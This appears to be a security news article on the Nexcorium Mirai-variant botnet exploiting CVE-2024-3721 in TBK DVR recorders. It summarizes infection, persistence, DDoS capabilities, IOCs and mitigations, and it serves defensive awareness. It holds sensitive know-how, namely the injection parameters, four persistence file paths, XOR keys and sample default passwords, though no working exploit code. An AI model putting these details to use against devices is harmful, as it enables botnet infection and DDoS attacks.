TBK DVR-4104 and DVR-4216 devices are under active exploitation by a Mirai-based botnet called Nexcorium, targeting an OS command injection vulnerability tracked as CVE-2024-3721. FortiGuard Labs has published a deep technical analysis linking the campaign to a threat actor identified as “Nexus Team.
CVE-2024-3721 is an OS command injection vulnerability in the TBK DVR-4104 and DVR-4216 digital video recorder devices,, surveillance hardware widely deployed across commercial and enterprise environments.
The flaw, originally disclosed by researcher “netsecfish” in April 2024 alongside a publicly available proof-of-concept (PoC), allows attackers to inject arbitrary OS commands by manipulating the mdb and mdc arguments in crafted HTTP requests.
TBK DVR devices have historically attracted threat actor interest; as far back as 2023, FortiGuard Labs recorded over 50,000 unique IPS detections in a single month targeting the platform through a separate authentication bypass bug, CVE-2018-9995.
The persistence of exploitation campaigns against TBK hardware reflects a broader reality across the IoT threat landscape: these devices are widely deployed, rarely patched, and frequently configured with weak or default credentials, an ideal trifecta for botnet operators seeking scalable infection vectors.
Nexus Team Threat Actor
FortiGuard Labs identified a distinctive artifact embedded within the exploit traffic: a custom HTTP header X-Hacked-By: Nexus Team – Exploited By Erratic that serves as a digital signature for the attacker group.
Based on this indicator, researchers are attributing the campaign to a threat actor they designate as “Nexus Team,” though this group currently lacks broad public documentation in threat intelligence repositories.
The use of custom exploit headers for attribution or ego-branding is a tactic increasingly observed in lower-tier but technically capable threat actors operating in the IoT botnet ecosystem.
Infection Chain and Downloader Mechanics
The initial exploitation of CVE-2024-3721 delivers a downloader shell script dvr to the compromised device. This script fetches architecture-specific malware binaries with filenames beginning with nexuscorp, targeting multiple Linux architectures: ARM, MIPS R3000, and x86-64 (AMD64).
Upon retrieval, the script sets file permissions to 777 and immediately executes the payload with an argument identifying the exploited device on the victim host.
This multi-architecture targeting approach is consistent with campaigns designed for maximum reach across the heterogeneous IoT device landscape, where CPU architectures vary significantly across manufacturers and device generations.
Nexcorium Malware Analysis
Upon execution, Nexcorium announces itself with the string “nexuscorp has taken control” a behavioral trait consistent with threat actor branding observed in other IoT malware families. The malware shares core architectural traits with the Mirai botnet family, including XOR-encoded configuration table initialization, a watchdog module, and a DDoS attack module.
Configuration Decoding: Nexcorium uses XOR decryption (keys 0x13 and 0xFD) to extract embedded configuration data, which includes the C2 server domain and port, persistence commands, a hard-coded brute-force credential wordlist, DDoS attack commands, and embedded exploit code.
Three Core Modules:
- Watchdog — Uses the process marker
NXS_WD_CHILDto distinguish spawned child processes and ensure continuous operation - Scanner — Initiates Telnet connections and launches credential brute-force attacks using a hard-coded wordlist containing default and commonly reused passwords (e.g.,
admin,hikvision,12345,motorola,888888) - Attacker — Parses C2 commands and launches targeted DDoS attacks
Notably, Nexcorium also bundles an exploit for CVE-2017-17215, targeting legacy Huawei HG532 routers a vulnerability that has appeared in numerous Mirai variants, demonstrating how older CVEs remain operationally relevant in botnets designed for breadth over precision.
Persistence Mechanisms
One of Nexcorium’s defining characteristics is its robust persistence architecture. After copying itself to /usr/local/bin/sysd the malware employs four simultaneous persistence methods to survive reboots and remediation attempts:
- Init configuration — Modifies
/etc/inittabto automatically restart the process if it terminates - Startup script — Creates or updates
/etc/rc.localto execute the malware at system startup - Systemd service — Drops a service file at
/etc/systemd/system/persist.service, enabling automatic startup via the system daemon - Cron job — Registers a scheduled
crontabtask to execute the malware after every reboot
After completing persistence setup, Nexcorium performs self-integrity verification using the FNV-1a hashing algorithm, and deletes its original binary from the initial execution path to hinder forensic analysis and evade detection.
DDoS Attack Capabilities
Nexcorium connects to its C2 server at r3brqw3d[.]b0ats[.]top and supports ten distinct DDoS attack methods, making it a versatile weapon for coordinated disruption campaigns:
| Command | Attack Type |
|---|---|
udp | UDP Flood |
syn | TCP SYN Flood |
ack | TCP ACK Flood |
std | TCP Generic Flood |
stmp | SMTP Flood |
psh | TCP PSH Flood |
urg | TCP URG Flag Flood |
udb | UDP Blast Flood |
vse | VSE Query Flood |
tcpa | TCP ACK + PSH Flood |
The malware can also receive killattk and botkill commands to halt attacks or terminate itself, indicating remote operator control over the botnet’s operational tempo.
Indicators of Compromise (IOCs)
Organizations should immediately scan for and block the following indicators across firewall, IDS, and SIEM platforms:
- IP Address:
84[.]200[.]87[.]36 - IP Address:
176[.]65[.]148[.]186 - C2 Domain:
r3brqw3d[.]b0ats[.]top
Mitigation and Fortinet
FortiGuard Labs confirms that the following Fortinet product detections are active for this campaign: BASH/Mirai.AEH!tr.dldr, ELF/Nexcorium.A!tr, ELF.Mirai.ATL!tr, and ELF/Mirai.EGX!tr.
The FortiGuard AntiVirus engine, integrated into FortiGate, FortiMail, FortiClient, and FortiEDR, blocks all described malware components using up-to-date signatures.
The FortiGuard Web Filtering Service blocks the C2 server domain, and an IPS signature (55717 TBK.DVR.SOSTREAMAX.Command.Injection) is available against CVE-2024-3721 exploitation.
Organizations not yet running Fortinet solutions should apply these immediate steps:
- Isolate or decommission unpatched TBK DVR-4104 and DVR-4216 devices from internet-facing segments
- Change all default credentials on DVR and IoT devices immediately
- Block identified IOCs at perimeter firewalls and DNS resolvers
- Monitor for Telnet-based lateral movement within internal networks
- Deploy network behavioral analytics to flag anomalous traffic indicative of DDoS bot activity
FAQ
Q1. What is CVE-2024-3721?
CVE-2024-3721 is an OS command injection vulnerability in TBK DVR-4104 and DVR-4216 devices that allows remote attackers to execute arbitrary commands by manipulating HTTP request parameters.
Q2. What is the Nexcorium malware?
Nexcorium is a multi-architecture Mirai botnet variant deployed by the “Nexus Team” threat actor to compromise IoT devices and conduct large-scale DDoS attacks via a centralized C2 server.
Q3. Which devices are affected by this campaign?
TBK DVR-4104 and DVR-4216 digital video recorders are the primary targets, though Nexcorium’s bundled CVE-2017-17215 exploit also puts legacy Huawei HG532 routers at risk.
Q4. How can organizations protect themselves from Nexcorium?
Organizations should immediately patch or isolate affected TBK DVR devices, change default credentials, block the listed IOCs, and deploy FortiGuard AntiVirus or equivalent solutions with current threat signatures.
Site: thecybrdef.com
About the Author
